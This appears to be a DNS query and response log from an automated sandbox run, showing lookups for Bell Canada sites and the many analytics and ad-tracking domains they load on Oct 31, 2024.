                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.157519102 CET192.168.2.91.1.1.10xcc70Standard query (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.157749891 CET192.168.2.91.1.1.10xb49cStandard query (0)vx7putk7mu3ggzzdqjka-pib559-61906c0f2-clientnsv4-s.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.159091949 CET192.168.2.91.1.1.10x6a4dStandard query (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.159321070 CET192.168.2.91.1.1.10x15c1Standard query (0)173-254-250-77_s-2-16-164-104_ts-1730380372-clienttons-s.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.167577982 CET192.168.2.91.1.1.10xfcacStandard query (0)siteimproveanalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.167761087 CET192.168.2.91.1.1.10xd52fStandard query (0)siteimproveanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.231456041 CET192.168.2.91.1.1.10x98abStandard query (0)analytics.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.231708050 CET192.168.2.91.1.1.10xfbf7Standard query (0)analytics.tiktok.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.233639956 CET192.168.2.91.1.1.10x3025Standard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.233768940 CET192.168.2.91.1.1.10x41d1Standard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.468995094 CET192.168.2.91.1.1.10xc4b7Standard query (0)snap.licdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:05.469139099 CET192.168.2.91.1.1.10xe848Standard query (0)snap.licdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.569843054 CET192.168.2.91.1.1.10xc3dfStandard query (0)c.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.569843054 CET192.168.2.91.1.1.10x30e1Standard query (0)c.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.577486038 CET192.168.2.91.1.1.10xf405Standard query (0)mybell.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.583559990 CET192.168.2.91.1.1.10xd5e2Standard query (0)mybell.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.616909027 CET192.168.2.91.1.1.10xe95Standard query (0)px.ads.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:07.616909981 CET192.168.2.91.1.1.10x6ff2Standard query (0)px.ads.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:08.088140965 CET192.168.2.91.1.1.10x9127Standard query (0)mybell.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.889856100 CET192.168.2.91.1.1.10xd708Standard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.890317917 CET192.168.2.91.1.1.10x65fbStandard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.891432047 CET192.168.2.91.1.1.10xeb24Standard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.891921997 CET192.168.2.91.1.1.10x79e3Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.920026064 CET192.168.2.91.1.1.10xb930Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:09.920263052 CET192.168.2.91.1.1.10xee83Standard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:12.703341007 CET192.168.2.91.1.1.10xaf7cStandard query (0)t.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:12.703628063 CET192.168.2.91.1.1.10x9a39Standard query (0)t.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.520126104 CET192.168.2.91.1.1.10x3eb2Standard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.520515919 CET192.168.2.91.1.1.10x981dStandard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.521581888 CET192.168.2.91.1.1.10xcbe9Standard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:14.522341967 CET192.168.2.91.1.1.10x9290Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.177594900 CET192.168.2.91.1.1.10xc74aStandard query (0)support.bell.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.177711964 CET192.168.2.91.1.1.10xc249Standard query (0)support.bell.ca65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.247257948 CET192.168.2.91.1.1.10x65f4Standard query (0)app.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.247384071 CET192.168.2.91.1.1.10xd6bbStandard query (0)app.link65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.556987047 CET192.168.2.91.1.1.10x9a57Standard query (0)c.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:16.557118893 CET192.168.2.91.1.1.10x6dcbStandard query (0)c.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:17.687808990 CET192.168.2.91.1.1.10xf788Standard query (0)app.linkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:13:17.687925100 CET192.168.2.91.1.1.10x5c2Standard query (0)app.link65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.492521048 CET1.1.1.1192.168.2.90xfb05No error (0)mybell.bell.camybell-on-priority.gdns.bell.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.492521048 CET1.1.1.1192.168.2.90xfb05No error (0)mybell-on-priority.gdns.bell.ca206.47.98.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:52.612150908 CET1.1.1.1192.168.2.90x7f28Server failure (2)mybell.bell.canonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.558413029 CET1.1.1.1192.168.2.90x44adNo error (0)www.bell.cawww.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:54.562916994 CET1.1.1.1192.168.2.90xfcbdNo error (0)www.bell.cawww.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:55.285978079 CET1.1.1.1192.168.2.90xcb47No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:55.286571026 CET1.1.1.1192.168.2.90xa4d7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:57.267714024 CET1.1.1.1192.168.2.90xdfe1No error (0)www.bell.cawww.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:57.269851923 CET1.1.1.1192.168.2.90x3447No error (0)www.bell.cawww.bell.ca.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:57.344712019 CET1.1.1.1192.168.2.90xcb9eNo error (0)mybell.bell.camybell-on-priority.gdns.bell.caCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:57.344712019 CET1.1.1.1192.168.2.90xcb9eNo error (0)mybell-on-priority.gdns.bell.ca206.47.98.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:57.441876888 CET1.1.1.1192.168.2.90x803dServer failure (2)mybell.bell.canonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.025712967 CET1.1.1.1192.168.2.90xf4eeNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:03.025712967 CET1.1.1.1192.168.2.90xf4eeNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.730190039 CET1.1.1.1192.168.2.90x8524No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.730530024 CET1.1.1.1192.168.2.90x8b2bNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.956675053 CET1.1.1.1192.168.2.90x83a5No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:04.982887983 CET1.1.1.1192.168.2.90xba03No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)m.bell.cacustom.bnc.ltCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt52.9.108.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt52.8.175.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt13.56.34.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt52.9.71.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt52.53.141.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt54.215.229.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt13.57.84.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089870930 CET1.1.1.1192.168.2.90x840aNo error (0)custom.bnc.lt13.56.86.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.090150118 CET1.1.1.1192.168.2.90xdddcNo error (0)m.bell.cacustom.bnc.ltCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.387466908 CET1.1.1.1192.168.2.90x55e3No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.387481928 CET1.1.1.1192.168.2.90x177fNo error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.576545954 CET1.1.1.1192.168.2.90x9bfeNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.576565981 CET1.1.1.1192.168.2.90x67adNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666169882 CET1.1.1.1192.168.2.90xa9a2No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666169882 CET1.1.1.1192.168.2.90xa9a2No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666169882 CET1.1.1.1192.168.2.90xa9a2No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.50.97.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.32.87.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.19.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.80.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.214.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.246.210.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.23.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666198015 CET1.1.1.1192.168.2.90xce15No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.247.166.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.793706894 CET1.1.1.1192.168.2.90x76ccNo error (0)bell.app.link18.239.18.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.793706894 CET1.1.1.1192.168.2.90x76ccNo error (0)bell.app.link18.239.18.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.793706894 CET1.1.1.1192.168.2.90x76ccNo error (0)bell.app.link18.239.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.793706894 CET1.1.1.1192.168.2.90x76ccNo error (0)bell.app.link18.239.18.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039937973 CET1.1.1.1192.168.2.90x2d98No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039937973 CET1.1.1.1192.168.2.90x2d98No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039937973 CET1.1.1.1192.168.2.90x2d98No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.60.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.135.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.50.97.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.194.45.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.241.19.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.32.87.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.254.36.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.039947987 CET1.1.1.1192.168.2.90xe65fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.23.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.075546980 CET1.1.1.1192.168.2.90x7046No error (0)bellca.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.075546980 CET1.1.1.1192.168.2.90x7046No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.075546980 CET1.1.1.1192.168.2.90x7046No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)bellca.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.133.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.216.198.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com108.128.214.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.254.36.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.23.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.18.245.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.50.97.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.080974102 CET1.1.1.1192.168.2.90xa221No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.247.166.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.198117018 CET1.1.1.1192.168.2.90x1ea3No error (0)collection.decibelinsight.net130.61.120.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.241229057 CET1.1.1.1192.168.2.90x2c71No error (0)somni.bell.cabellcanada.tt.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.241229057 CET1.1.1.1192.168.2.90x2c71No error (0)bellcanada.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.273762941 CET1.1.1.1192.168.2.90x4577No error (0)somni.bell.cabellcanada.tt.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.273762941 CET1.1.1.1192.168.2.90x4577No error (0)bellcanada.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.273762941 CET1.1.1.1192.168.2.90x4577No error (0)adobetarget.data.adobedc.net66.235.152.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.273762941 CET1.1.1.1192.168.2.90x4577No error (0)adobetarget.data.adobedc.net66.235.152.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.273762941 CET1.1.1.1192.168.2.90x4577No error (0)adobetarget.data.adobedc.net66.235.152.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:11.538075924 CET1.1.1.1192.168.2.90x7858No error (0)cdn.decibelinsight.net130.61.120.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380606890 CET1.1.1.1192.168.2.90xce2bNo error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380625963 CET1.1.1.1192.168.2.90x89efNo error (0)www.google.com172.217.18.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380635977 CET1.1.1.1192.168.2.90xc065No error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380646944 CET1.1.1.1192.168.2.90x21d8No error (0)cdn.branch.io18.66.27.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380646944 CET1.1.1.1192.168.2.90x21d8No error (0)cdn.branch.io18.66.27.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380646944 CET1.1.1.1192.168.2.90x21d8No error (0)cdn.branch.io18.66.27.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380646944 CET1.1.1.1192.168.2.90x21d8No error (0)cdn.branch.io18.66.27.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380676985 CET1.1.1.1192.168.2.90xa397No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.380707026 CET1.1.1.1192.168.2.90x7e1No error (0)collection.decibelinsight.net130.61.120.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.478190899 CET1.1.1.1192.168.2.90x9e4cNo error (0)somni.bell.cabellcanada.tt.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.478190899 CET1.1.1.1192.168.2.90x9e4cNo error (0)bellcanada.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.480238914 CET1.1.1.1192.168.2.90x2973No error (0)somni.bell.cabellcanada.tt.omtrdc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.480238914 CET1.1.1.1192.168.2.90x2973No error (0)bellcanada.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.480238914 CET1.1.1.1192.168.2.90x2973No error (0)adobetarget.data.adobedc.net66.235.152.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.480238914 CET1.1.1.1192.168.2.90x2973No error (0)adobetarget.data.adobedc.net66.235.152.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:13.480238914 CET1.1.1.1192.168.2.90x2973No error (0)adobetarget.data.adobedc.net66.235.152.225A (IP address)IN (0x0001)false
